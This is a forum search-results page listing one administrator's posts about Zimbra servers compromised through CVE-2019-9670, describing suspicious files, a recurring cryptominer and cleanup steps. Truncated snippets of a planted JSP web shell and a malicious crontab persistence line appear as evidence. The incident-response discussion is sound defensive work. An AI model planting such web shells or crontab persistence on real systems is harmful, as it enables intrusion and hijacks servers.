marnellej> I confirm i also had /opt/zimbra/lib/zmcheckexpiredcerts /opt/zimbra/lib/zmlogswatch and /opt/zimbra/lib/zmmailboxdwatch in some of my systems.
These files seems not to be destined there.
With Regards
Search found 8 matches
- Tue Jun 04, 2019 7:18 am
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631827
- Fri May 31, 2019 8:48 am
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631827
Re: CVE-2019-9670 being actively exploited
Hi guys Can you check the following code found in the corresponding files and tell if it is malicious. To me it seems to be. << /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!clas...
- Fri May 31, 2019 7:28 am
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631827
Re: CVE-2019-9670 being actively exploited
Hi guys Can you check the following code found in the corresponding files and tell if it is malicious. To me it seems to be. << /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class...
- Thu May 30, 2019 8:36 am
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631827
Re: CVE-2019-9670 being actively exploited
Fast food, fast dates, fast sex, fast Internet, fast info, fast solutions .......
Take some time to read the topic and the posts before yours pls....
You may also try to replicate the steps described and then ask constructive questions or even propose some solutions.
Good Luck
Take some time to read the topic and the posts before yours pls....
You may also try to replicate the steps described and then ask constructive questions or even propose some solutions.
Good Luck
- Wed May 29, 2019 1:47 pm
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631827
Re: CVE-2019-9670 being actively exploited
So ....i think i have some progress. First thanks to: erefer@gmail.com for the usefull commands AB_ZIMBRA for defining me what is the malicious part in 404.jsp file opsystem for the info about how to get the original files In my case i did the following: 1. find /opt/zimbra -name \*.jsp -exec grep -...
- Tue May 28, 2019 11:17 am
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631827
Re: CVE-2019-9670 being actively exploited
elby> I suppose you see something shitty like this(in my case only this was left in the zimbra user crontab): */9 * * * * tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="e...
- Tue May 28, 2019 9:08 am
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631827
Re: CVE-2019-9670 being actively exploited
mqaroush > means you should delete it and recreate it. Pls read the other posts before your.
- Tue May 28, 2019 9:06 am
- Forum: Administrators
- Topic: CVE-2019-9670 being actively exploited (Hacked Server)
- Replies: 248
- Views: 631827
Re: CVE-2019-9670 being actively exploited
UPDATE 28.05.2019 The cryptominer zmswatch appeared again even after all the taken procedures and renewing ssh keys. It seems they also managed to unlock the zimbra`s user crontab and add a line to it again. UPDATE 30.05.2019 Found addition malicious process and file. Tutorial updated. Hello guys Th...